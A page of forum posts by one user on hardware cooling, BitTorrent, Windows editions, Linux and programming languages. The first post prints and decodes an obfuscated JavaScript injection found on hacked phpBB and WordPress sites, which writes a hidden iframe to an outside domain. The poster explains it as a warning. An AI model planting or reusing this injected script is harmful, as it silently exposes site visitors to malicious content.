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Posts posted by jipman

  1. Guys (moody, moonwitch), you both seem to share the same problem.

    Moody is using a phpBB forum, and moon has problems with her log, that runs on Wordpress..

    However, you both (well.. only moody now, moon deleted her problem a while ago). Have a piece of javascript at the bottom of your site.

    <script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script></body>

    When you decode it, you can see that it's actually a hidden frame which links to a attempts to open a site http://forums.xisto.com/no_longer_exists/

    Which, in return attempts to open these sites:



    The first one is some kinda of counter, which can be ignored

    The second one attempts to load a certain applet, which I can't be bothered to checkout what it exactly does, probably something malicious :S

    To make a long story short. This is what could've happened.

    1. Both of you suffered from an automated exploit batch which put the code there.
    2. You guys got your site hacked, because someone was bored
    3. I think this is it, Xisto has gotten hacked :|.

    I come to this conclusion because both Moody and Moonwitch use a quite common piece of software (phpbb, wordpress), and they have the same problem at around the same time. And that there is some kind of script around here somewhere that changes stuff (cronjob maybe?).

    Anyway, everyone, if you use any kind of common software, forums/msg's boards/blogs etc. etc..

    Please check your site for above code and remove it. And report it ofcourse.

  2. I've been wondering about this for a while.Since the 'gap' between to burned bits is getting smaller, doesn't that make the disc more vulnerable to scratches? Because the distance between two bits getting smaller, if a scratch occurs, wouldn't that make more bits not readable?I know modern disc players have a builtin piece of error detection and fixes it (somehow). But with such type of discs wouldn't there be too much 'damage' to the disc even with a small scracht so the error detection can't cope with it?

  3. Hm...I think I might favor the Pirated Ultimate Edition if you ask me. Or maybe the uB€R H@x0R edition.... That'd be cool.Seriously, Although computers get faster and better, There's totally no need for such extensive GUI stuff... If you ask me, that standard win98 layout is good enough for about everyone with an IQ > 50.Now some serious criticism, what if a user has starter edition and outgrows it, everyone aqcuires skills in terms of using a computer so they might end up with a piece of OS that doesn't offer them enough functionality anymore. Should they buy another new license??? And what should he/she go for, ultimate ,home or professional. And what about people that edit videos, but don't do anything else except for some browsing?If MS tries to tailor everything for everyone, why don't they make 6 billion different versions, that way everyone can have their OS their way. jeezz.... bunch of stuckups... :|. Windows Vista jipman's edition... it sounds nice though.ps. They're only making it difficult for themselves though, now they have to maintain 7 versions of windows, which means 7 different service packs, bug fixes etc.

  4. @unimatrix.Do you understand what bittorrent actually is? The RIAA will not target a specific bit torrent client because that would mean they have to sue about 1000+ people/companies. It's better to sue the creator of the protocol, which is not likely to happen since Bram cohen, bit torrents creator just got ... million dollars to fund his research to a new bit torrent standard.Bit torrent is a protocolBit Comet, Azureus, G3 Torent, etc etc are CLIENTS that can understand that protocolIt's something like HTTP and webbrowsers, you can't sue mozilla because you can view warez-sites on firefox.On a side note, I am wondering how you would have to sue anything that has to do with bit comet anyway. That would mean they have to sue every tracker-owner.... And there are quite a big number of trackers around here.....

  5. Liquid Cooling requires reasonable amount of maintaining, refilling the liquid, checking for leaks and stuff. Also, super quiet is an overstatement, the radiator for the thing has fans in them, so basically you MOVE the source of the sound rather than REmoving it.Also, installing liquid cooling is quite more troublesome and difficult than any normal air cooler.

  6. basic worm virus that uses MSN, AOL or whatever IM service. Most of them are .com's .bat's or .pif's.Most im based virusses work that way, using msn to spread itself further.Can't really imagine why noone ever takes the time to check out what file is received before opening it :|.If you want to fix it, you have to find out what file it sends, then you can look up the name in google then you can find out the worm's name, then you can get a fix-tool



    Seems like eDonkey's going to quit too

    and what BitTorrent lacks is the interface and functionality that eMule has, mainly because eMule is open source.

    And who says Bit Torrent isn't opensource????

    And duh... the basic bittorrent client is lame, but Bit Comet makes up for the poor implementation of the protocol in the official client.

  8. [joke?]Here's a good network, always 100% uptime, infinite speeds and always what you needtadaaaaa ..... the official whatabout-just-buying-your-software/media-program ?Only downside, it costs some.[/joke?]No seriously, there's always a new protocol standing up if one goes down. There's no need to fear that it will be all over for illegal p2p networking.Anyway, I'm glad they are weeding out the p2p networks, this all buys BitTorrent some more living time. I seriously don't care what happens about emule/donkey or whatever, it kinda got lame anyway.

  9. Peltier coolers are off the hook, those things are bloody expensive.


    Knowing you I'd stick to normal air cooling because those coolers are the easiest to install and they give a good performance.


    There are are a few quite popular brands these days, here's two I know some stuff about:




    Zalman has very good coolers that do a good job in keeping the lot quiet and cool. The con of this is that Zalman is pretty expensive, the cheapest one around is about €25.


    Since I have a Zalman of my own, i can say that the cooling is quite adequate, formerly my Pentium 4 was around the 60 degrees, after the zalman it lowered about 10 degrees to 50.


    arctic cooling


    Then there is arctic, normal arctic's are usually around the €10 with some supermodels that are around €20. They are more silent than Zalman's because of their lower fanspeeds. If I am correct their cooling performance is about the same as zalmans


    For silence either of these two brands should do the trick (of course cooling is ok too).


    About installation.


    Most coolers are kept on their place with 2 clips/thumb/screws. Opening them up is not really a big issue. However, lifting the Cooler is and one should be carefull not to drop the cooler on the cpu (I don't think it will like that).


    After removing the cooler, best thing to do is remove the cpu as well and scrape/rub off the residue of the cooling stuff paste thingy (doing so will increase cooling capacity abit).


    Since the cpu is already out you can apply the new coolingstuff (usually comes with the cooler) on it.


    After that, put it back and now comes the time to install the new cooler. This can be tricky and you have to watch out not to damage anything.


    ps. Zalman coolers are quite large and therefor difficult to place




    I'd buy an Arctic. They're cheaper, perform great and are silent.

  10. Don't have to be scared though, even if bit torrent becomes closed source, the previous open source versions WILL remain open since you can't change that anymore. So other people could develop the protocol even further.Side note, if there will be a commercial version of Bit torrent, it will be very different from the ones we use now, since those don't have any digital rights management systems implemented, so it wouldn't even be backward compatible.ps. Azureus s/u/c/k/s a/s/s/, use bit comet :mellow:

  11. Well bit torrent is extremely fast. Probably fastest p2p protocol. If you get a slow download it is usually because of the lack of seeders, in which case it'd be wise to look for a tracker with more seeders for the same file. Usually same releases get posted to several trackers.
    So don't blame the protocol, blame the lack of seeders.

    Which brings us to the point of the more new bit torrent programs like bit comet which supports the use of multiple trackers(using more than 1 tracker), and a DHT network, which works in a way similar to kazaa, using nodes to contact other nodes.

  12. Since you already know C++, there's absolutely no use to learn visual basic. VB is not object oriented, three quarters of the generated binaries are null-bytes. And it's more than a mix-up-a-little-script-fast-for-one-time-use language than anything else. Anyway, why learn any basic language AT ALL if you already know C++. Ofcourse, C++ and Java for instance are both quite a lot faster than Visual Basic, noway that vb (.net) can be faster than C++ or Java, and since your programs are NOT GUI dependant, you can use or leave the GUI if you wish instead of being forced to oneHm... this was quite the microsoft Visual basic bash rant wasn't it?

  13. qwijbow, it's probably not that USING linux is difficult, the GNOME gui and stuff is quite user friendly. The problem arises when one tries to change some settings or add new software. The way of installing rpm's for example is kinda weird, sometimes in konqueror you can just click to install, but sometimes you have to use commandline. And a lot of times one has to find depencies that some rpm's have. Also, Changing display properties and sound properties is quite difficult, it's a whole bunch of clicks just to change the display resolution.And, this can't be helped, most people formerly used windows and the way the menu structure is in linux is just quite different from windows.What also is a big problem, (i had when first started using linux, and sometimes now too), is the way of storage linux uses. all those names, /etc /home /usr /bin..... to first time users, this is quite a problem, and a lot of times after people install their software, they can't even find it if their's no ICON on their desktops. :|....Whereas most of the software for windows are GUI'ed, quite logical, since windows is dependant on it. Linux has probably more commandline based tools than graphical ones, which makes the level of difficulty much higher since most windows people don't even know what a shell is.Although I think most Linux users would agree that commandline works very fast and easy once one gets the hang of it, it's in our nature to choose looks over performance, also, Microsoft does M a r k e t i n g. Which the Linux users don't.This all brings me to my final point:If people don't want to learn about how to use a slightly more complicated OS, let them be. If windows does what they want it to do, why would they have to go Linux? We all know that Linux is cheaper faster safer (as in virus threats safer), and way way more 1337er than windows B).No seriously guys, if people don't want to expand their horizons, we can't force them. All we can do is show them that there's more outside the Window, and hope they decide to give it a shot.

  14. [spoiler-alert]FFY, I don't make coding errors B)[/spoiler-alert]Anyways, I'd like to let you guys know I am kinda out of inspiration for hacking challenge number 5. Since it has to be more difficult than number 4, but may not be unsolveable.... Troublesome :P-------------------------------edit: seems I just forgot that I haven't made a number 4 yet..... Ahh well.... euh....$message = str_replace('4','3',$message);$message = str_replace('5','4',$message);return $message;:blink:-------------------------------edit #2: Wow, I just found out that I already started with a number 4.... guess I kinda forgot about it.

  15. Holland probably doesn't have such laws, although I must say that our prime minister (Mr. Balkenende) is kinda like a servant of George Bush. I believe there is some kinda law here that allows the US army to barge right into holland if an American is hold in custody there.So if america has such laws, I guess hollands gonna copy m sooner or later.

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